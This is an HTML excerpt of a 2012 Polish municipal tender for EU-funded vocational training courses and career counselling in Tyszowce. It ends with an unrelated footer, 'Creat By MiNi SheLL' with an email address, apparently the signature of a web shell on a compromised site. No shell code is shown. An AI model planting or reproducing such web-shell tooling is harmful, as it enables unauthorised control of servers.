<p>1. Formularz ofertowy stanowiący załącznik nr 2 do SIWZ, 2.Oświadczenie o posiadaniu akredytacji jeżeli Wykonawca posiada taką akredytację dla zakresu kształcenia na które składa ofertę, wydanej przez właściwego dla siedziby Wykonawcy kuratora oświaty na podstawie art. 68b ust. 9 ustawy z dnia 7 września 1991 r. o systemie oświaty tj. Dz. U. z 2004 r. Nr 256, poz. 2572, z późn. zm. lub certyfikatu stanowiący załącznik nr 9 do SIWZ,3 Wykaz kadry kwalifikacje i doświadczenie  wykładowcy dla każdego oddzielne zał. nr 10 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Dostosowanie kwalifikacji i doświadczenia zawodowego kadry dydaktycznej do zakresu szkolenia - 15</li>
<li>3 - Posiadanie przez instytucję szkoleniową certyfikatów jakości usług, akredytacji kuratora - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy, za wyjątkiem okoliczności oraz warunków zmian określonych poniżej 1.1 zmniejszenia liczby uczestników szkolenia z przyczyn niezależnych od Zamawiającego, będącego wynikiem nie podjęcia kursu lub rezygnacji kandydata pomimo wcześniejszych
deklaracji o uczestnictwie 1.2 wystąpienia nieprzewidzianych zdarzeń losowych np. choroba, śmierć, rozwiązanie stosunku pracy itp., wymagających zmiany kadry. Zmiana ta może nastąpić pod warunkiem,że Wykonawca zapewni osobę, której doświadczenie zawodowe, wykształcenie oraz dodatkowe kwalifikacje zawodowe nabyte w formach pozaszkolnych będą minimum takie same jak osoby wskazanej w wykazie kadry zaangażowanej w realizację szkolenia. 1.3 zmiany miejsca szkolenia pod warunkiem, że nowe miejsce szkolenia zagwarantuje wszystkie podane w ofercie i zawartej umowie warunki lokalowe i wyposażenie w urządzenia, w tym dydaktyczne, nie gorsze niż określone w ofercie, na podstawie której zawarto umowę, zmiana może być wprowadzona na pisemny wniosek wykonawcy po uzyskaniu akceptacji zamawiającego 1.4. zmianę terminu rozpoczęcia i w dalszej konsekwencji zakończenia szkolenia z przyczyn leżących po stronie zamawiającego polegających na braku możliwości skompletowania odpowiedniej do zawartej umowy liczby uczestników szkolenia. Zmiana może być wprowadzona na pisemny wniosek zamawiającego po uzyskaniu akceptacji wykonawcy.2. Zmiana umowy w zakresie określonym w pkt 1 podpunkcie 1.2. może nastąpić na umotywowany wniosek Wykonawcy. 3. Zmiany umowy wymagają formy pisemnej w postaci aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lublin.pl/tyszowce<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Tyszowcach
ul. 3 Maja 10
22-30 Tyszowce
Dział Świadczeń Rodzinnych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Tyszowcach
ul. 3 Maja 10
22-30 Tyszowce
Dział Świadczeń Rodzinnych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 Kurs prawa jazdy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1  Kurs prawa jazdy   kat. B osób 7, kat. C osób 3,  kat. D 1 osoba i kat. T 3 osoby w tym 1 z kat. B Łączna ilość osób dla wszystkich kategorii 14 osób.
Godziny szkolenia powinny być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów Dz. U. z 2005 r. Nr 217, poz. 1834 z późn. zm.Program szkolenia musi odpowiadać programowi szkolenia określonemu przez Rozporządzenie Ministra Infrastruktury z dnia 27 października 2005r. w spawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów Dz. U. z 2005r. nr 217, poz. 1834 z późn. zm.Celem szkolenia jest przygotowanie do egzaminu państwowego teoretycznego i praktycznego. Wykonawca zobowiązany jest do zorganizowania i opłacenia kosztu egzaminu państwowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Dostosowanie kwalifikacji i doświadczenia zawodowego kadry dydaktycznej do zakresu szkolenia - 15</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatów jakości usług, akredytacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 Opiekun osoby starszej,  Zadanie nr 3 Kucharz, Zadanie nr 4 Fryzjer z egzaminem czeladniczym, Zadanie nr 5 Sprzedawca z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2  Opiekun osoby starszej  celem kursu jest teoretyczne i praktyczne przygotowanie słuchaczy do  wykonywania  zawodu opiekuna  przez 4 osoby . Liczba godzin- 152 godz.1.Kurs skierowany jest do 4 osób będących beneficjentami projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie podstawowe i ponadgimnazjalne. Zadanie nr 3 Kucharz, celem kursu jest teoretyczne i praktyczne przygotowanie słuchaczy do  wykonywania zawodu kucharza - 3 osoby 140 godzin 1.Kurs skierowany jest do 3 osób będących beneficjentami projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie ponadgimnazjalne.
Zadanie nr 4 Fryzjer z egzaminem czeladniczym 2 osoby, 256 godzin 1.Kurs skierowany jest do 2 osób będących beneficjentami projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie gimnazjalne i ponadgimnazjalne.2.Szkolenie powinno zakończyć się egzaminem czeladniczym.Zadanie nr 5  Sprzedawca z obsługą kasy fiskalnej celem kursu jest teoretyczne i praktyczne przygotowanie słuchaczy do  wykonywania zawodu sprzedawcy, oraz obsługi kasy fiskalnej,obsługa klientów, wystawianie rachunków i faktur, obsługa kasy fiskalnej 1.Kurs skierowany jest do 5 osób będących beneficjentami projektu systemowego Droga do zmian  realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie podstawowe, gimnazjalne i ponadgimnazjalne.2.Liczba godzin szkolenia: 104 godz. w tym zajęcia teoretyczne 30 godzin i zajęcia praktyczne 74 godz.3.Szkolenie powinno zakończyć się egzaminem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Dostosowanie kwalifikacji i doświadczenia zawodowego kadry dydaktycznej do zakresu szkolenia - 15</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatów jakości usług, akredytacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 6 Operator ładowarki teleskopowej,  Zadanie nr 7 Operator wózków jezdniowych z napędem silnikowym, Zadanie nr 8 Operator koparko ładowarki klasa III wszystkie typy,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie odpowiednich uprawnień do obsługi maszyn w danej klasie oraz praktyczna nauka eksploatacji maszyn w różnych warunkach terenowych, a także zdobycie wiedzy teoretycznej w zakresie dokumentacji technicznej, bezpieczeństwa i higieny pracy przy eksploatacji maszyn, technologii wykonywania robót ziemnych, zasad użytkowania i obsługi maszyn.
Program szkolenia musi być zgodny z § 24 rozporządzenia Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych Dz. U. z 2001 r. nr 118, poz. 1263 oraz programem szkolenia zatwierdzonym przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. Po ukończeniu szkolenia Wykonawca zobowiązany jest wydać, uczestnikowi szkolenia, zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji, oraz w przypadku uzyskania pozytywnego wyniku egzaminu na uprawnienia operatora, świadectwo i książeczkę operatora, zgodnie z § 26 ust. 1 rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych Dz. U. z 2001 r. Nr 118, poz. 1263, Zadanie nr 6 Operator ładowarki teleskopowej 1 osoba, 50 godzin, 1.Kurs skierowany jest do 1 osoby będącej beneficjentem projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkałej na terenie Gminy Tyszowce. Osoba ta ma wykształcenie gimnazjalne, 2.Liczba godzin szkolenia: 50 godz. w tym 15 zajęć teoretycznych i 35 zajęć praktycznych. 3.Wykonawca musi dysponować potencjałem technicznym, parkiem maszynowym wraz z placem manewrowym zgodnie z wytycznymi Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie, Zadanie nr 7 Operator wózków jezdniowych z napędem silnikowym 6 osób, 70 godzin, 1.Kurs skierowany jest do 6 osób będących beneficjentami projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie podstawowe, gimnazjalne i ponadgimnazjalne.2.Liczba godzin szkolenia: 70 godz. w tym 50 godzin teoretycznych i 20 godzin praktycznych
Zadanie nr 8 Operator koparko ładowarki klasa III wszystkie typy 1 osoba, 180 godzin 1.Kurs skierowany jest do 1 osoby będącej beneficjentem projektu systemowego Droga do zmian  realizowanego w ramach POKL współfinansowanego przez EFS zamieszkałej na terenie Gminy Tyszowce. Osoba ta ma wykształcenie ponadgimnazjalne. 2.Liczba godzin szkolenia: 180 godz. w tym 120 godzin zajęć teoretycznych i 60 godzin zajęć praktycznych 3.Wykonawca musi dysponować potencjałem technicznym, parkiem maszynowym wraz z placem manewrowym zgodnie z wytycznymi Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Dostosowanie kwalifikacji i doświadczenia zawodowego kadry dydaktycznej do zakresu szkolenia - 15</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatów jakości usług, akredytacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 9: Doradztwo zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 9 Doradztwo zawodowe 21 osób bezrobotnych, nieaktywnych zawodowo i rolników, 50 godzin, 1.Doradztwo zawodowe dla 21 osób bezrobotnych i rolników beneficjentów  projektu systemowego w ramach POKL Droga do zmian w następującym podziale, Doradztwo zawodowe indywidualne  dla 21 osób po 2 godziny osobę. Godzina zajęć to jedna godzina zegarowa. Zajęcia powinny odbywać się w dni powszednie. Wykonawca zobowiązany jest do przedstawienia Zamawiającemu harmonogramu spotkań nie później niż 5 dni roboczych przed pierwszym spotkaniem. Zajęcia powinny odbywać się na terenie miasta Tyszowce. Doradztwo zawodowe indywidualne powinno być poprzedzone doradztwem grupowym. Doradztwo indywidualne powinno być przeprowadzone w czasie jednego spotkania bez możliwości podziału.Doradztwo zawodowe grupowe dla 21 osób  8 godzin. Jedna godzina zajęć to jedna godzina zegarowa. Dopuszcza się wykonanie usługi w ciągu dwóch dni po 4 godziny dziennie lub osiem godzin w ciągu jednego dnia. Zajęcia powinny odbywać się w dni powszednie w godzinach od 9.00 do 15.00 w Tyszowcach lub w odległości 40 km od siedziby Zamawiającego wówczas w  koszcie doradztwa należy uwzględnić koszt dojazdu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Dostosowanie kwalifikacji i doświadczenia zawodowego kadry dydaktycznej do zakresu szkolenia - 15</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatów jakości usług, akredytacji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com